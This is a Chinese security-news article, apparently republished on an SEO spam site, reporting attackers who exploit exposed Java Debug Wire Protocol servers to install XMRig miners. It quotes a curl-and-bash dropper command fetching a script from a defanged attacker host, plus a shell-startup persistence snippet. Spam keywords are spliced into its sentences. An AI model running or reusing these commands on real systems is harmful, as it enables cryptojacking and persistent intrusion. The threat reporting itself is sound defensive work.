您现在的位置是:物联网 >>正文
黑客利用暴露在公网的Java调试协议服务器部署挖矿恶意软件
物联网2人已围观
简介网络安全研究人员发现新一轮网络攻击正针对那些无意中将Java调试线协议JDWP)服务器暴露在互联网上的组织机构。攻击者利用这一被忽视的入口点,部署复杂的加密货币挖矿恶意软件。漏洞利用机制JDWP作为J ...
网络安全研究人员发现新一轮网络攻击正针对那些无意中将Java调试线协议(JDWP)服务器暴露在互联网上的黑客组织机构。攻击者利用这一被忽视的利用入口点 ,部署复杂的暴露部署加密货币挖矿恶意软件。

JDWP作为Java平台的公网标准功能,本意是试协让开发人员能够检查实时应用程序 ,从而促进远程调试。议服但当JDWP在生产系统中保持可访问状态时——通常由于配置错误或在生产环境中使用开发标志——它就会成为远程代码执行的器挖矿强大载体 。
这种威胁的恶意出现伴随着快速的建站模板利用周期。在多个观察到的软件案例中,攻击者能够在系统暴露后数小时内入侵易受攻击的黑客机器。攻击流程通常始于对开放JDWP端口(最常见的利用是5005端口)的大规模互联网扫描 。一旦识别到目标 ,暴露部署攻击者会发起JDWP握手以确认服务处于活动状态,公网然后建立会话,试协获得对Java虚拟机(JVM)的议服交互式访问权限。模板下载这种访问权限使攻击者能够枚举加载的类并调用方法 ,最终实现在主机上执行任意命令。
攻击技术分析Wiz安全分析师在观察到针对其TeamCity(一种流行的CI/CD工具)蜜罐服务器的利用尝试后 ,确认了此次攻击活动。攻击者表现出高度的自动化和定制化能力,部署了经过修改的XMRig挖矿程序,其中包含硬编码配置以规避检测。
值得注意的是源码下载,该恶意软件使用矿池代理来隐藏目标钱包地址,增加了追踪或破坏非法挖矿操作的难度。这些攻击的影响十分严重 。通过滥用JDWP ,威胁行为者不仅可以部署挖矿程序,还能建立深度持久性 、操纵系统进程,并可能转向入侵环境中的其他资产。恶意软件隐蔽的特性,服务器租用加上其能够伪装成合法系统工具的能力 ,增加了长期未被发现活动和资源耗尽的风险。
感染链剖析聚焦感染机制,攻击者利用JDWP缺乏身份验证的特点,直接通过协议注入和执行shell命令 。建立会话后,他们通常会使用如下命令下载投放器脚本(如logservice.sh):
复制curl -o /tmp/logservice.sh -s https://canonicalconnect[.]com/logservice.sh bash /tmp/logservice.sh1.2.该脚本经过精心设计 ,能够终止竞争挖矿程序,下载伪装成logrotate的恶意XMRig二进制文件 ,并将其安装到用户的源码库配置目录中 。随后,脚本会设置多种持久化机制,包括修改shell启动文件、创建定时任务以及安装伪造的系统服务。
以下代码片段展示了脚本如何通过shell配置确保持久性 :
复制add_to_startup() { if [ -r "q" ]; then if ! grep -Fxq "$EXEC >/dev/null 2>&1" "q"; then echo "$EXEC >/dev/null 2>&1" >> "q" fi fi }1.2.3.4.5.6.7.
这种感染链既高效又具有弹性,使得挖矿程序能够在系统重启和用户登录后继续存活 。攻击者使用看似合法的进程名称和系统位置,进一步增加了检测和修复的难度 ,这凸显了加强配置管理和严格监控暴露服务的必要性。亿华云
Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“算法与编程”。http://www.bzli.cn/news/047e299950.html
上一篇:2023 年十款优秀爬虫保护软件
下一篇:聊聊密码、密钥和熟悉度偏差
相关文章
VMware 修补了多个产品中的关键身份验证绕过漏洞
物联网Bleeping Computer 资讯网站披露,VMware 多个产品中出现关键身份验证绕过漏洞,漏洞允许攻击者获取管理员权限。 据悉,该漏洞被追踪为 CVE-2022-22972,最 ...
【物联网】
阅读更多数千家欺诈性网店瞄准黑色星期五购物者
物联网建立虚假的在线商店从未如此简单:骗子们只需花费少量资金注册域名,利用SHOPYY电子商务平台搭建网站,并利用大型语言模型(LLM)重写现有的产品列表,以优化其搜索引擎表现。“我们首次在2024年7月观 ...
【物联网】
阅读更多黑吃黑?专门攻击黑客和网络安全人员的恶意软件
物联网近日,网络安全公司Checkmarx首次披露了一种专门攻击黑客和网络安全研究人员的供应链攻击。据报道,这场长达一年的攻击活动通过开源软件的“木马化”版本来窃取黑帽黑客的敏感信息,同时还针对善意的安全研 ...
【物联网】
阅读更多
热门文章
最新文章
友情链接
- 2022年及以后的四个数据中心提示
- 神舟战神笔记本电脑质量如何?(探索神舟战神笔记本电脑的品质与性能)
- 探究GeForce980MZ(颠覆视觉体验的游戏级显卡)
- 企业通过谈判策略降低赎金支付的实战经验
- 聊聊到底什么是BRAS?
- API成为新一代安全焦点?瑞数信息发布最新《API安全趋势报告》
- 深度研究 | 如何利用可信数据空间赋能企业数据流通安全
- 谷歌 Chrome 零日漏洞遭广泛利用,可执行任意代码
- 苹果6s升级iOS11的体验(以苹果6s为例,探索iOS11的新特性和性能提升)
- 戴尔易安信加固过的机箱,保证在远程和恶劣环境下工作的可靠性,满足边缘工作负载不断增长的需求 企业服务器b2b信息平台亿华云云服务器源码库香港物理机网站建设